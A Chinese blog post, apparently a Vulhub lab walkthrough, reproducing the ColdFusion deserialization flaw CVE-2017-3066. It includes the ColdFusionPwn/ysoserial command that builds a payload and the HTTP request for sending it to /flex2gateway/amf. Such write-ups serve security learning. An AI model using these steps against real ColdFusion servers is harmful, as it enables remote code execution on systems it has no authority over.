Vulhub-coldfusion--CVE-2017-3066

最新推荐文章于 2021-12-06 16:54:53 发布
最新推荐文章于 2021-12-06 16:54:53 发布
阅读量402 收藏 1
点赞数
分类专栏: vulhub 网络安全 文章标签: 安全漏洞 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ronin_qianmo/article/details/119215820
版权

1、漏洞描述

Adobe ColdFusion是美国Adobe公司的一种动态Web服务器产品,其运行的CFML(ColdFusion标记语言)是针对Web应用程序的一种程序设计语言。
攻击者可利用该漏洞在冲突应用程序的一部分中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion(2016版)更新3及之前的版本, ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。

2、启动靶场

在这里插入图片描述

3、访问网址

http://x.x.x.x:8500
在这里插入图片描述发现是404网页,接着去访问
http://x.x.x.x:8500/CFIDE/administrator/index.cfm
在这里插入图片描述发现这个网页和上个漏洞一样,但是这个网页是要输入vulhub,即可成功安装Adobe ColdFusion
在这里插入图片描述

3、我们使用ColdFusionPwn工具来生成POC

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser

我在centos靶机上执行是不可以的
在这里插入图片描述但是在kali上是可以运行的
在这里插入图片描述

4、生成poc.ser文件后,将POC作为数据包body发送给

http://your-ip:8500/flex2gateway/amf,Content-Type为application/x-amf:
POST /flex2gateway/amf HTTP/1.1
Host: your-ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853

在这里插入图片描述

5、发送poc内容

由于编码问题,如果直接从Notepad++/Notepad里面复制粘贴为body部分,是不成功的,即使返回的状态码是200
在这里插入图片描述正确的方法应该是:
右击选择Paste From File,上传poc.cer文件
在这里插入图片描述再到Raw界面添加HTTP头部,如果成功,并且打算以后还需要用的话,右击选择Copy to File保存
在这里插入图片描述

6、进入容器检验poc

通过docekrid进入容器
Docker exec docker容器id -it /bin/bash
在这里插入图片描述

7、看到success即为复现成功

浅陌.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ColdFusionPwn.jar
01-08
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup ...此工具可以Adobe ColdFusion漏洞利用,例如(CVE-2017-3066) 阅读建议:此资源开发以java为基础,生成所需要的poc。
CVE-2017-3066(Adobe ColdFusion 反序列化漏洞)
G_Fu_Q的博客
04-08 1295
本文仅做漏洞复现记录与实现,请勿用于非法用途 漏洞介绍: Adobe ColdFusion(直译:冷聚变),是一个动态Web服务器,其CFML(ColdFusion Markup Language)是一种程序设计语言,类似JSP里的JSTL(JSP Standard Tag Lib),从1995年开始开发,其设计思想被一些人认为非常先进,被一些语言所借鉴。 Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。 以下版本受
Adobe ColdFusion 反序列化漏洞(CVE-2017-3066
时光凉春衫薄的博客
12-06 728
产品样子 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion (2016 release) Update 3及之前的版本,ColdFusion 11 Update 11及之前的.
利用Vulnhub复现漏洞 - Adobe ColdFusion 反序列化漏洞(CVE-2017-3066
JiangBuLiu的博客
06-28 4942
Adobe ColdFusion 反序列化漏洞(CVE-2017-3066Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现POC500错误 Vulnhub官方复现教程 https://vulhub.org/#/environments/coldfusion/CVE-2017-3066/ 漏洞原理 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的C...
Coldfusion-11-Application.cfc-Template:脚本样式 Application.cfc 模板,包含 Coldfusion 11 的所有方法
06-13
Coldfusion-11-Application.cfc-模板 包含 Coldfusion 11 的所有方法的脚本样式 Application.cfc 模板。 我对 Adob​​e 的文档和缺乏脚本风格的 Coldfusion 11 示例感到沮丧,所以我创建了这个。 如何使用 更改...
SPAW - ColdFusion MX CFC version-开源
05-15
功能齐全,可完全自定义,多语言,可换肤的基于WebColdFusion WYSIWYG HTML编辑器控件。 需要Win IE 5.5+(在其他浏览器中显示标准文本区域)。 这是SPAW的ColdFusion MX端口:...
从三层架构到MVC-MVP
03-02
最近几年被推荐为Sun公司J2EE平台的设计模式,并且受到越来越多的使用ColdFusion和PHP的开发者的欢迎。模型-视图-控制器模式是一个有用的工具箱,它有很多好处,但也有一些缺点。二.MVC是否适合进行大项目的开发...
cf-tinymce:用于创建tinyMCE实例的ColdFusion函数-支持压缩和每页多个实例
04-29
概要ColdFusion函数用于创建tinyMCE实例-使用CFN并允许每页多个实例。 这是一个不错的基础,具有不错的默认设置。程式码范例要显示一个充满名为“ read”的查询的生物信息的RTE实例,请执行以下操作: <cfoutput>#...
ColdFusion安装指南
03-31
ColdFusion 8 安装指南 英文文档
ADOBE COLDFUSION 8开发者指南(英文版)
10-16
ADOBE COLDFUSION 8开发者指南。英文版来的。
10 - vulhub - Adobe ColdFusion 反序列化漏洞 (CVE-2017-3066)
利他者利己,利己者无功。利他利己,利己利他。
10-20 3609
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
POC - Adobe ColdFusion 反序列化漏洞(CVE-2017-3066
JiangBuLiu的博客
10-16 1378
安装010Editer 下载链接:http://www.pc6.com/softview/SoftView_55129.html 复制POC的十六进制 00 03 00 00 00 01 00 00 00 00 00 00 00 01 11 0A 07 47 6F 72 67 2E 61 70 61 63 68 65 2E 61 78 69 73 32 2E 75 74 69 6C 2E 4D 6...
Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)复现,python编写POC和EXP
wangqiao258的博客
09-30 436
Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)复现,python编写POC 环境搭建 使用vulhub,进入对应文件夹启动Adobe CanFusion 8.0.1版本服务器: [root@localhost ~]# cd /home/vulhub-master/coldfusion/CVE-2010-2861/ [root@localhost CVE-2010-2861]# docker-compose up -d 查看端口: [root@localhost ~]# d
Adobe ColdFusion 反序列化漏洞靶场复现(CVE-2017-3066
qq_43232893的博客
04-12 764
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 墨者学院之Adobe ColdFusion 反序列化漏洞靶场复现(CVE-2017-3066)简介一、漏洞复现开启环境CVE-2017-3066漏洞复现 简介 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程
Adoble ColdFusion反序列化漏洞(CVE-2017-3066
Kevin's Blog
01-18 803
文章目录一、介绍1.1 漏洞介绍1.2 影响版本二、漏洞复现三、防御 一、介绍 1.1 漏洞介绍   Adoble ColdFusion是一个动态Web服务器,其运行的 CFML(ColdFusion Markup Language)针对Web应用的一种脚本语言。文件以*.cfm为文件名,在ColdFusion专用的应用服务器环境下运行。   低版本的Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服 务。 1.2 影响版本 Ad
vulhub漏洞复现系列之Adobe ColdFusioncve-2010-2861文件读取漏洞、CVE-2017-3066反序列化漏洞)
weixin_43071873的博客
12-10 897
CVE-2010-2861)Adobe ColdFusion 文件读取漏洞 一、漏洞简介 Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 二、漏洞影响 Adobe ColdFusion 8 Adobe ColdFusion 9 三、漏洞复现 直接访问http://www.0-sec.org:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en,即可
coldfusion xpath使用
最新发布
07-22
ColdFusion 中可以使用 XPath 来解析 XML 文档。下面是一个简单的示例: ``` <!--- 加载 XML 文档 ---> <cfset xmlData = "<books><book><title>ColdFusion 9 Developer Tutorial</title><author>John Doe</author>...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值